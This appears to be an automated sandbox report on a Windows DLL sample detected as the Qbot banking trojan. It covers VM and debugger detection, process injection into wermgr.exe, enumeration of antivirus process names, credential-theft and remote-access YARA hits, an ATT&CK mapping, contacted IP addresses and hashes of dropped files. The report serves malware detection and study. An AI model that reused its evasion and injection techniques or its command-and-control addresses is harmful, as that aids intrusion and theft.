            Source: Amcache.hve.9.dr; Binary or memory string: Microsoft Hyper-V Generation Counter
            Source: Amcache.hve.9.dr; Binary or memory string: VMware7,1
            Source: Amcache.hve.9.dr; Binary or memory string: NECVMWar VMware SATA CD00
            Source: Amcache.hve.9.dr; Binary or memory string: VMware Virtual disk SCSI Disk Device
            Source: Amcache.hve.9.dr; Binary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
            Source: Amcache.hve.9.dr; Binary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
            Source: Amcache.hve.9.dr; Binary or memory string: VMware, Inc.me
            Source: Amcache.hve.9.dr; Binary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/5&280b647&0&000000
            Source: Amcache.hve.9.dr; Binary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW71.00V.18227214.B64.2106252220,BiosReleaseDate:06/25/2021,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware7,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
            Source: Amcache.hve.9.dr; Binary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/5&1ec51bf7&0&000000

            Anti Debugging

            Source: C:\Windows\SysWOW64\rundll32.exe; Code function: 3_2_10035030 Start: 10035315 End: 1003515E 3_2_10035030
            Source: C:\Windows\SysWOW64\rundll32.exe; Code function: 3_2_1001F523 mv_dict_get,LoadLibraryA,LoadLibraryA,InitOnceBeginInitialize,InitOnceComplete,LoadLibraryA,GetProcAddress,mv_log,atoi,mv_log,mv_log,GetProcAddress,3_2_1001F523
            Source: C:\Windows\SysWOW64\rundll32.exe; Code function: 3_2_10035030 rdtsc 3_2_10035030
            Source: C:\Windows\SysWOW64\rundll32.exe; Code function: 3_2_1001E0D9 mov eax, dword ptr fs:[00000030h] 3_2_1001E0D9
            Source: C:\Windows\SysWOW64\rundll32.exe; Code function: 18_2_041B1015 mov eax, dword ptr fs:[00000030h] 18_2_041B1015
            Source: C:\Windows\SysWOW64\rundll32.exe; Code function: 18_2_041B21CD mov eax, dword ptr fs:[00000030h] 18_2_041B21CD
            Source: C:\Windows\SysWOW64\rundll32.exe; Process queried: DebugPort

            HIPS / PFW / Operating System Protection Evasion

            Source: C:\Windows\SysWOW64\rundll32.exe; Memory written: C:\Windows\SysWOW64\wermgr.exe base: FE0000
            Source: C:\Windows\SysWOW64\rundll32.exe; Memory written: C:\Windows\SysWOW64\wermgr.exe base: FB0000
            Source: C:\Windows\SysWOW64\rundll32.exe; Memory written: C:\Windows\SysWOW64\wermgr.exe base: 1083C50
            Source: C:\Windows\SysWOW64\rundll32.exe; Memory allocated: C:\Windows\SysWOW64\wermgr.exe base: FB0000 protect: page execute and read and write
            Source: C:\Windows\SysWOW64\rundll32.exe; Memory allocated: C:\Windows\SysWOW64\wermgr.exe base: FE0000 protect: page read and write
            Source: C:\Windows\SysWOW64\rundll32.exe; Memory written: C:\Windows\SysWOW64\wermgr.exe base: FB0000 value starts with: 4D5A
            Source: C:\Windows\SysWOW64\cmd.exe; Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\F086.dll",#1
            Source: C:\Windows\SysWOW64\rundll32.exe; Process created: C:\Windows\SysWOW64\wermgr.exe C:\Windows\SysWOW64\wermgr.exe
            Source: C:\Windows\SysWOW64\rundll32.exe; Queries volume information: C:\ VolumeInformation
            Source: C:\Windows\SysWOW64\wermgr.exe; Queries volume information: C:\ VolumeInformation
            Source: C:\Windows\SysWOW64\rundll32.exe; Code function: 18_2_041BC2D1 GetSystemTimeAsFileTime,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,18_2_041BC2D1
            Source: C:\Windows\SysWOW64\rundll32.exe; Code function: 3_2_10092180 GetTimeZoneInformation,GetModuleHandleA,GetProcAddress,3_2_10092180
            Source: C:\Windows\SysWOW64\rundll32.exe; Code function: 18_2_041BBB4D GetCurrentProcessId,GetLastError,GetVersionExA,GetWindowsDirectoryW,18_2_041BBB4D
            Source: rundll32.exe, 00000012.00000003.499075306.000000000439F000.00000004.00000020.00020000.00000000.sdmp; Binary or memory string: bdagent.exe
            Source: rundll32.exe, 00000012.00000003.499075306.000000000439F000.00000004.00000020.00020000.00000000.sdmp; Binary or memory string: vsserv.exe
            Source: rundll32.exe, 00000012.00000003.499075306.000000000439F000.00000004.00000020.00020000.00000000.sdmp; Binary or memory string: avp.exe
            Source: Amcache.hve.9.dr; Binary or memory string: c:\program files\windows defender\msmpeng.exe
            Source: rundll32.exe, 00000012.00000003.499075306.000000000439F000.00000004.00000020.00020000.00000000.sdmp; Binary or memory string: avgcsrvx.exe
            Source: rundll32.exe, 00000012.00000003.499075306.000000000439F000.00000004.00000020.00020000.00000000.sdmp; Binary or memory string: mcshield.exe
            Source: rundll32.exe, 00000012.00000003.499075306.000000000439F000.00000004.00000020.00020000.00000000.sdmp; Binary or memory string: MsMpEng.exe

            Stealing of Sensitive Information

            Source: Yara match; File source: decrypted.memstr, type: MEMORYSTR
            Source: Yara match; File source: 18.2.rundll32.exe.280c00.0.unpack, type: UNPACKEDPE
            Source: Yara match; File source: 18.2.rundll32.exe.41b0000.1.unpack, type: UNPACKEDPE
            Source: Yara match; File source: 18.2.rundll32.exe.280c00.0.raw.unpack, type: UNPACKEDPE
            Source: Yara match; File source: 00000012.00000002.508131058.000000000026A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match; File source: 00000012.00000002.508336162.0000000004320000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY

            Remote Access Functionality

            Source: Yara match; File source: decrypted.memstr, type: MEMORYSTR
            Source: Yara match; File source: 18.2.rundll32.exe.280c00.0.unpack, type: UNPACKEDPE
            Source: Yara match; File source: 18.2.rundll32.exe.41b0000.1.unpack, type: UNPACKEDPE
            Source: Yara match; File source: 18.2.rundll32.exe.280c00.0.raw.unpack, type: UNPACKEDPE
            Source: Yara match; File source: 00000012.00000002.508131058.000000000026A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match; File source: 00000012.00000002.508336162.0000000004320000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY

            Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services
            Execution: 3 Native API; Scheduled Task/Job; At (Linux); At (Windows); Cron; Launchd; Scheduled Task
            Persistence: 1 DLL Side-Loading; Boot or Logon Initialization Scripts; Logon Script (Windows); Logon Script (Mac); Network Logon Script; Rc.common; Startup Items
            Privilege Escalation: 311 Process Injection; 1 DLL Side-Loading; Logon Script (Windows); Logon Script (Mac); Network Logon Script; Rc.common; Startup Items
            Defense Evasion: 1 Masquerading; 21 Virtualization/Sandbox Evasion; 311 Process Injection; 1 Rundll32; 1 DLL Side-Loading; Steganography; Compile After Delivery
            Credential Access: 1 Credential API Hooking; 1 Input Capture; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync
            Discovery: 2 System Time Discovery; 131 Security Software Discovery; 21 Virtualization/Sandbox Evasion; 2 Process Discovery; 1 Remote System Discovery; 1 File and Directory Discovery; 14 System Information Discovery
            Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management
            Collection: 1 Credential API Hooking; 1 Input Capture; 1 Archive Collected Data; Input Capture; Keylogging; GUI Input Capture; Web Portal Capture
            Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel; Exfiltration Over Alternative Protocol
            Command and Control: 21 Encrypted Channel; 1 Ingress Tool Transfer; 2 Non-Application Layer Protocol; 113 Application Layer Protocol; Fallback Channels; Multiband Communication; Commonly Used Port
            Network Effects: Eavesdrop on Insecure Network Communication; Exploit SS7 to Redirect Phone Calls/SMS; Exploit SS7 to Track Device Location; SIM Card Swap; Manipulate Device Communication; Jamming or Denial of Service; Rogue Wi-Fi Access Points
            Remote Service Effects: Remotely Track Device Without Authorization; Remotely Wipe Data Without Authorization; Obtain Device Cloud Backups
            Impact: Modify System Partition; Device Lockout; Delete Device Data; Carrier Billing Fraud; Manipulate App Store Rankings or Ratings; Abuse Accessibility Features; Data Encrypted for Impact

            [Behavior graph] ID: 878699; Sample: F086.dll; Startdate: 31/05/2023; Architecture: WINDOWS; Score: 96
            Graph signatures: Found malware configuration; Yara detected Qbot; Sample uses string decryption to hide its real strings; 2 other signatures. Contacted hosts include 2.36.64.159 (VODAFONE-IT-ASNIT, Italy), 85.57.212.13 (UNI2-ASES, Spain) and 94 other IPs or domains.
            Process tree: loaddll32.exe started two rundll32.exe instances, cmd.exe and 8 other processes. The first rundll32.exe (Overwrites code with unconditional jumps - possibly settings hooks in foreign process; Writes to foreign memory regions; Allocates memory in foreign processes; Injects a PE file into a foreign processes) started wermgr.exe, which connected to 124.122.47.148 (TRUE-AS-APTrueInternetCoLtdTH, Thailand) and 151.65.167.77 (ASN-WINDTREIUNETEU, Italy) on port 443 and to 2 other IPs or domains. The second rundll32.exe (Potentially malicious time measurement code found) started WerFault.exe. cmd.exe started rundll32.exe, which started WerFault.exe. The other processes started three WerFault.exe instances, one of which contacted 192.168.2.1.

            Source | Detection | Scanner | Label | Link
            F086.dll | 0% | ReversingLabs | |
            F086.dll | 0% | Virustotal | | Browse

            No Antivirus matches

            Name | IP | Active | Malicious | Antivirus Detection | Reputation
            xfinity.com | 68.87.41.40 | true | false | | high
            www.xfinity.com | unknown | unknown | false | | high

            Name | Malicious | Antivirus Detection | Reputation
            https://xfinity.com/ | false | | high

            Name | Source | Malicious | Antivirus Detection | Reputation
            https://www.xfinity.com/mobile/policies/broadband-disclosures | national[1].htm.24.dr | false | | high
            http://upx.sf.net | Amcache.hve.9.dr | false | | high
            https://www.xfinity.com/learn/internet-service/acp | national[1].htm.24.dr | false | | high
            https://www.xfinity.com/networkmanagement | national[1].htm.24.dr | false | | high
            https://streams.videolan.org/upload/ | rundll32.exe, rundll32.exe, 00000003.00000002.488409319.00000000100AE000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 00000004.00000002.488551661.00000000100AE000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 0000000B.00000002.495622337.00000000100AE000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 0000000E.00000002.504031322.00000000100AE000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 00000010.00000002.504159065.00000000100AE000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 00000012.00000002.508750049.00000000100AE000.00000002.00000001.01000000.00000003.sdmp, F086.dll | false | | high

            IP | Domain | Country | Flag | ASN | ASN Name | Malicious
                            IP
                            192.168.2.1
Joe Sandbox Version: 37.1.0 Beryl
Analysis ID: 878699
Start date and time: 2023-05-31 01:58:10 +02:00
Joe Sandbox Product: CloudBasic
Overall analysis duration: 0h 13m 21s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 104, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes analysed: 26
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• HDC enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample file name: F086.dll
Detection: MAL
Classification: mal96.troj.evad.winDLL@31/23@2/100
                            EGA Information:
                            • Successful, ratio: 50%
                            HDC Information:
                            • Successful, ratio: 20.2% (good quality ratio 15.3%)
                            • Quality average: 55.6%
                            • Quality standard deviation: 38.7%
                            HCA Information:
                            • Successful, ratio: 99%
                            • Number of executed functions: 23
                            • Number of non-executed functions: 134
                            Cookbook Comments:
                            • Found application associated with file extension: .dll
                            • Override analysis time to 240s for rundll32
                            • Exclude process from analysis (whitelisted): WerFault.exe, WMIADAP.exe, svchost.exe
                            • Excluded IPs from analysis (whitelisted): 13.89.179.12, 52.168.117.173, 52.182.143.212, 104.77.34.176
                            • Excluded domains from analysis (whitelisted): onedsblobprdeus16.eastus.cloudapp.azure.com, e10994.dscx.akamaiedge.net, onedsblobprdcus15.centralus.cloudapp.azure.com, login.live.com, blobcollector.events.data.trafficmanager.net, www.xfinity.com.edgekey.net, watson.telemetry.microsoft.com, onedsblobprdcus17.centralus.cloudapp.azure.com
                            • Execution Graph export aborted for target rundll32.exe, PID 684 because there are no executed function
                            • Not all processes where analyzed, report is missing behavior information
                            • Report creation exceeded maximum time and may have missing disassembly code information.
                            • Report size exceeded maximum capacity and may have missing behavior information.
Time | Type | Description
01:59:13 | API Interceptor | 5x Sleep call for process: WerFault.exe modified
01:59:18 | API Interceptor | 1x Sleep call for process: loaddll32.exe modified
01:59:28 | API Interceptor | 9x Sleep call for process: wermgr.exe modified
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
                                                                    No context
Process: C:\Windows\SysWOW64\WerFault.exe
File Type: Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category: dropped
Size (bytes): 65536
Entropy (8bit): 0.9055530276531717
Encrypted: false
SSDEEP: 192:efDtJid0oXPHBUZMX4jed+y/u7skS274ItWc:0JizXPBUZMX4je//u7skX4ItWc
MD5: AF18B553EC67FCDEF7BDBA2170BD4B92
SHA1: C44C450B0CA548BA4431B057CF785368021EF4FF
SHA-256: 0BAA393E8562FE0131FFD8C6E7BC4C79447DA588742A2DBC2965BFDEEF13CC66
SHA-512: 0C8B54A30E622787F05B6F420CA4A946052984107E9FCEFC022DED13932FE391D4523D38A1EA8D700F3CC52691B81FDF913FCCD7FB71EE3C90A130ABB1B7B60D
Malicious: false
                                                                    Process:C:\Windows\SysWOW64\WerFault.exe
                                                                    File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                    Category:dropped
                                                                    Size (bytes):65536
                                                                    Entropy (8bit):0.9052764652862895
                                                                    Encrypted:false
                                                                    SSDEEP:192:cS0zip0oXBHBUZMX4jed+y/u7skS274ItWc:8ziHXRBUZMX4je//u7skX4ItWc
                                                                    MD5:15C8CDA5A28B3171E528E79E6E234456
                                                                    SHA1:A41D05F8FA66EE4212EF3573C8EFC29988650F03
                                                                    SHA-256:272CE77BFAB3C1FC9F9BB8B2CE4F8740170DE34C9CFF2AF5CC66DF7FA5F69BEB
                                                                    SHA-512:4A00F30AF7B1E5A269AE7E45045219817FF5C7A704DEA76D52E5B069B30D8C0066F4D5B6FB963B2291AA83C2923B4321DBCE17454F2659AE40044D46489D17CF
                                                                    Malicious:false
                                                                    Process:C:\Windows\SysWOW64\WerFault.exe
                                                                    File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                    Category:dropped
                                                                    Size (bytes):65536
                                                                    Entropy (8bit):0.9052291517948012
                                                                    Encrypted:false
                                                                    SSDEEP:192:shiK0oXDHBUZMX4jed+y/u7skS274ItWc:2icXDBUZMX4je//u7skX4ItWc
                                                                    MD5:77352191DB2CF40C3543835B77D6C396
                                                                    SHA1:5ECC9072BBF244687393F704313D600A600DAECF
                                                                    SHA-256:2AED6978324591A9826C1075FF75C69E4E15A62986292F35F4EF74927176E787
                                                                    SHA-512:1F707CAF6D8A3E8966C96D4D72C75FB814671952BA6BD2595AD6369B5A6A1197647886EA5E0D8CE9A72EC9D8ED7FD4CCA8BA5363AEE656E3D9B10E8889C8A17A
                                                                    Malicious:false
                                                                    Process:C:\Windows\SysWOW64\WerFault.exe
                                                                    File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                    Category:dropped
                                                                    Size (bytes):65536
                                                                    Entropy (8bit):0.9052042795414165
                                                                    Encrypted:false
                                                                    SSDEEP:192:/32iox0oXpHBUZMX4jed+y/u7skS274ItWc:uio/XZBUZMX4je//u7skX4ItWc
                                                                    MD5:CFF1DC224E66E7C9A7609947F684DA79
                                                                    SHA1:259218C1702375FA4A24E5E1787233AEAB166DB7
                                                                    SHA-256:8C771BC18083265E2837C83585C0A7C9679B5B6B2A4733760C606F46BE2FBC47
                                                                    SHA-512:F4A9A4741B04B3E1F369D77161DE7B506FF2867BDB679EC0BEB8C9CD4AF8D8C8EB75C1D31FA76327CFD2BFCB412C0DCF0177A891E35913D119ADB69AB9A1A067
                                                                    Malicious:false
                                                                    Process:C:\Windows\SysWOW64\WerFault.exe
                                                                    File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                    Category:modified
                                                                    Size (bytes):65536
                                                                    Entropy (8bit):0.9052227737497617
                                                                    Encrypted:false
                                                                    SSDEEP:192:uErih0oXrHBUZMX4jed+y/u7skS274ItWc:1iPXLBUZMX4je//u7skX4ItWc
                                                                    MD5:7073C2C15CA3CA17313B5CC045C7D742
                                                                    SHA1:593F997AE259507F7E21C3DEA67B660D845515CB
                                                                    SHA-256:D3FE52F0F4EF659030D4444803F215F26E66FACD398ECED19729B17F3FBCD86A
                                                                    SHA-512:0983648C097B7444E58C6005B863CD1ABAC7E2192BF7AE3FFFDFD4D532A81D00547CFAFD41B61271E40B3DF314938E3099C78C39AEB6EB3049459B5FC44B500D
                                                                    Malicious:false
                                                                    Process:C:\Windows\SysWOW64\WerFault.exe
                                                                    File Type:Mini DuMP crash report, 14 streams, Wed May 31 08:59:10 2023, 0x1205a4 type
                                                                    Category:dropped
                                                                    Size (bytes):36014
                                                                    Entropy (8bit):2.3565124382333593
                                                                    Encrypted:false
                                                                    SSDEEP:192:kOd8rZ6Vchj7RqzvcCO5SkbL+TtcnMmkGlvMYwYvkdNXTn:IFjo45LbL+T+nMmkGlvJvkdl
                                                                    MD5:0F6EEC80C94DB64381D5DB6B71AA90B1
                                                                    SHA1:217E75E0AD88A492F4E585714E3C9F3B65C11971
                                                                    SHA-256:EA733CC46783AA8A9C85BBA33FEDA6E47C8FB430C532B32C5078D82FD6F0E2CE
                                                                    SHA-512:15E6A6A3B3C315473146183D215F4AA615EF735B6A807FF71E032174736A771006A58CAB23DAFF0898AC175E48A7BE11DED7BA1F785C013F202F9D141CAEA904
                                                                    Malicious:false
                                                                    Process:C:\Windows\SysWOW64\WerFault.exe
                                                                    File Type:Mini DuMP crash report, 14 streams, Wed May 31 08:59:10 2023, 0x1205a4 type
                                                                    Category:dropped
                                                                    Size (bytes):35650
                                                                    Entropy (8bit):2.39521596273267
                                                                    Encrypted:false
                                                                    SSDEEP:192:klr8rZ6Vchj0RhivSO5Skb8+TFCzid5oQFsUta5utGGIwttY+:1FjuA5Lb8+TFAidB1tEwY
                                                                    MD5:B2288462AD98709F1246FEE69FDF7A76
                                                                    SHA1:D3ECE985125FE76AD648C4CCA767376977901C3E
                                                                    SHA-256:58599D46929C56E25DD0E889EC87751583F89A70B0CD87EDE37FA181198A0942
                                                                    SHA-512:84949F4F386C6A2D33A196DDC701FEFE6FB73AAC4858C231BAC02A1AAF6E9BBEC2CE0DBF48ED36CBB1C57C3229B7832000676091EDF4341DDCA44907EB51FC0B
                                                                    Malicious:false
                                                                    Process:C:\Windows\SysWOW64\WerFault.exe
                                                                    File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                    Category:dropped
                                                                    Size (bytes):8240
                                                                    Entropy (8bit):3.6911710563593108
                                                                    Encrypted:false
                                                                    SSDEEP:192:Rrl7r3GLNikd67zX6Y1c6ngmfTOSfYCprl89br4sfXZm:RrlsNiO6v6YO6ngmfTOSarrfE
                                                                    MD5:5B6947C71EEFCA9294A5E69F11499F1E
                                                                    SHA1:17CCC788F845C4512FD509144940EE072BEB5601
                                                                    SHA-256:C05DD659C9AA7B606126D95DE710FFEA4122D3FCB01750D5D9602616DC55A665
                                                                    SHA-512:E2C960BB49E7BA48B80DE3441480646D7F10402972178ED0C514DC217502732E6B42037D277D52D62DADF0F9934CED4AE3007E3D9E16B3D3B4FA3125ED8D3A4B
                                                                    Malicious:false
                                                                    Process:C:\Windows\SysWOW64\WerFault.exe
                                                                    File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                    Category:dropped
                                                                    Size (bytes):8242
                                                                    Entropy (8bit):3.6923306800014446
                                                                    Encrypted:false
                                                                    SSDEEP:192:Rrl7r3GLNiP567zd6YeP69gmfTOSfYCprv89brSsfSZm:RrlsNih6V6YG69gmfTOSIrRfl
                                                                    MD5:AAA6990AA9B5300E54EAD151955099C4
                                                                    SHA1:28CA8BD7ED76CA9CC0BAD3AC4E3FAD1BC36A1BA6
                                                                    SHA-256:6CA37B9E94AE7E1918C34B905213486ADCCD9837AE7A44C3473A1CC5FE4DF1D0
                                                                    SHA-512:A12CB5E6684A68C8569608686D404D77CB3E5C0E6088F1010345ECB23C2026712AB3EE99CAF3A6E83FE7EE7BB3027BEDDE00EA05EE97BABB2F695ECB898ADD05
                                                                    Malicious:false
                                                                    Process:C:\Windows\SysWOW64\WerFault.exe
                                                                    File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                    Category:dropped
                                                                    Size (bytes):4626
                                                                    Entropy (8bit):4.450765755369854
                                                                    Encrypted:false
                                                                    SSDEEP:48:cvIwSD8zs6KJgtWI9igmaWgc8sqYjW8fm8M4JCdsEZFbx+q8/vKD4SrS8d:uITf6YFgmbgrsqYHJivxUkDW8d
                                                                    MD5:FB8398C5D49E57B61873F7836968D4F4
                                                                    SHA1:5633552D1F9423A88ADEE57A82EA2EBCE6D61E14
                                                                    SHA-256:D70984202B8484F2D7FD8E88E359214268EFCFA821B859E761CF66DAFBFBB9B5
                                                                    SHA-512:24A4D9BF04DD133C7805D79D068DDA624714F075F184EFE25F23336ABA6CFA1A932691C9CF7C804CC1B47E4CC2BF336E96F2C5BE627C251033F3B0C337157DCF
                                                                    Malicious:false
                                                                    Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="17134" />.. <arg nm="vercsdbld" val="1" />.. <arg nm="verqfe" val="1" />.. <arg nm="csdbld" val="1" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="1033" />.. <arg nm="geoid" val="244" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="2064609" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.1.17134.0-11.0.47" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="4096" />..
                                                                    Process:C:\Windows\SysWOW64\WerFault.exe
                                                                    File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                    Category:dropped
                                                                    Size (bytes):4626
                                                                    Entropy (8bit):4.454945419149455
                                                                    Encrypted:false
                                                                    SSDEEP:48:cvIwSD8zs6KJgtWI9igmaWgc8sqYj68fm8M4JCdsEZFss+q8/vKN4SrSXd:uITf6YFgmbgrsqYTJiAsUiDWXd
                                                                    MD5:DB97EEF771B452F9F7F176B7133B104C
                                                                    SHA1:D4741EE267B9078C48E47A0DF29B7C51A29BB48D
                                                                    SHA-256:8A4FFE279B80049C8C908AD7C1BF6EFAC8EA25B04370A8A75F8DED341967BE8E
                                                                    SHA-512:1E5F38B34D1326F01E879D8491561781E1239D62950015A22BBCCD792B3C2E693118E9A6CA8AFD44AB7282A9FC8971DFF7E26D817D303E1A64CFD6B3A37E5B37
                                                                    Malicious:false
                                                                    Process:C:\Windows\SysWOW64\WerFault.exe
                                                                    File Type:Mini DuMP crash report, 14 streams, Wed May 31 08:59:15 2023, 0x1205a4 type
                                                                    Category:dropped
                                                                    Size (bytes):36982
                                                                    Entropy (8bit):2.28604369303349
                                                                    Encrypted:false
                                                                    SSDEEP:192:N/x8rZ6Vchj6RB7n3O5SkbKu78+Tk1yshiQCkbVk/f:4Fjo7ne5LbKu78+T/sQQCF
                                                                    MD5:65A79580193316F00B9537DBD05C759A
                                                                    SHA1:0509C86D177199C6890E8AB128295AE15DE40154
                                                                    SHA-256:6C1C539FCBB6B74AE4C8BC1F8987FAECDD78C84EB224961A0C0775843CA8203D
                                                                    SHA-512:E7C2ABCE84ADD40BC31C5BC5DAF5E7613C464E0583B78A29444FF4B3F8DF5EAA5865C37F4DF1B94FEAC6FBEDA89BF2DBAB1349B9B89AB403D71D71E7151D88E4
                                                                    Malicious:false
                                                                    Process:C:\Windows\SysWOW64\WerFault.exe
                                                                    File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                    Category:dropped
                                                                    Size (bytes):8244
                                                                    Entropy (8bit):3.6926274115897813
                                                                    Encrypted:false
                                                                    SSDEEP:192:Rrl7r3GLNiDh67zH6Yet6FYgmfTuSfYCprr89bGYsfSaim:RrlsNil6/6Yk66gmfTuSEGLfF
                                                                    MD5:C2FACDC90DF657E2D952EAAEE86E3C89
                                                                    SHA1:CBFCD29AB470F56489FFFCFA461C9555362B1159
                                                                    SHA-256:39216B1B99C1CCE1DFE64F369DD915A64744D3809D81817CDE046D5BA4029042
                                                                    SHA-512:D1EBA428570DCF2C48DFF0ABAA6E4D2C89ED7FC65856AFAE7C3D988B42FFB69213A9A8AB0DB7598C614EFB3709BDF930015A372168BBE09B34D79353BA13A81E
                                                                    Malicious:false
                                                                    Process:C:\Windows\SysWOW64\WerFault.exe
                                                                    File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                    Category:dropped
                                                                    Size (bytes):4626
                                                                    Entropy (8bit):4.453884983142049
                                                                    Encrypted:false
                                                                    SSDEEP:48:cvIwSD8zs6KJgtWI9igmaWgc8sqYjR8fm8M4JCdsE9Fw+q8/v8k4SrSy6d:uITf6YFgmbgrsqYyJioUFDWy6d
                                                                    MD5:B99FB9C9DA6B1260791A2D2A17CE49B6
                                                                    SHA1:AB738A440D002E5117FF322432EC5F0261272173
                                                                    SHA-256:2A98C2BD601204628AADB7EA22BABACB3B1B561E6FF170503E30811CDF70E25F
                                                                    SHA-512:C24AC4AB7EA8C88170FEA97E17DFD678F5CD04C611F0192D9376DBF2DC8097C64B72037D85D33548FDE9824275B4745E5B99E054A90A23CFBF96959FD384783A
                                                                    Malicious:false
                                                                    Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="17134" />.. <arg nm="vercsdbld" val="1" />.. <arg nm="verqfe" val="1" />.. <arg nm="csdbld" val="1" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="1033" />.. <arg nm="geoid" val="244" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="2064609" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.1.17134.0-11.0.47" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="4096" />..
                                                                    Process:C:\Windows\SysWOW64\WerFault.exe
                                                                    File Type:Mini DuMP crash report, 14 streams, Wed May 31 08:59:19 2023, 0x1205a4 type
                                                                    Category:dropped
                                                                    Size (bytes):37518
                                                                    Entropy (8bit):2.2657648227128058
                                                                    Encrypted:false
                                                                    SSDEEP:192:asfR8rZ6VchjwRS0MO5SkbpN+TPdaTnTVmSf:a5FjKD5LbpN+TPdaTTVv
                                                                    MD5:0C8EEBD2872DD5C0CAD3638A7A96EAA1
                                                                    SHA1:6207DBB3BBFB122838A43BB2024B90055C8D9B2B
                                                                    SHA-256:4810ED7B6A069EC1BAAAC5654C94F8EDDDC200FF9F7D02DD093DAD43A70DF5E8
                                                                    SHA-512:DA2178DEB669B242BF0F581CA9AE9C44CA747FA119D5786B48ACCC7F5C0BE086ABA112CA5A8170D74338B9250EF040BE51E3B08AB43B902B8C0DDEB3F92EA4A4
                                                                    Malicious:false
                                                                    Process:C:\Windows\SysWOW64\WerFault.exe
                                                                    File Type:Mini DuMP crash report, 14 streams, Wed May 31 08:59:19 2023, 0x1205a4 type
                                                                    Category:dropped
                                                                    Size (bytes):44074
                                                                    Entropy (8bit):2.117624747538192
                                                                    Encrypted:false
                                                                    SSDEEP:192:asAfDbUX+dxdK3O5Skb3huQm+T2Oe6aZwdpMsnV:aO+Ye5Lb3hI+T2Oe620
                                                                    MD5:3270832A2753A6BFAB4F073274509DE0
                                                                    SHA1:C3045AA4DCE5E48FEE972ED5ADE713CCB2A256EE
                                                                    SHA-256:8D4860E0D6CFA7338BCF252CBF79A19A6D29D60AB9C6F70E2119F3A026EAA3D3
                                                                    SHA-512:B9D760F4E8E0C53F56DE9FA6E6C91E5995BE2BAB19218561E28F0E4AE4F38E3C23543A05B4114913CDC50AE718229BF8CE52737B555EE2FCBFA595D0A65E2553
                                                                    Malicious:false
                                                                    Process:C:\Windows\SysWOW64\WerFault.exe
                                                                    File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                    Category:dropped
                                                                    Size (bytes):8238
                                                                    Entropy (8bit):3.6893195807327688
                                                                    Encrypted:false
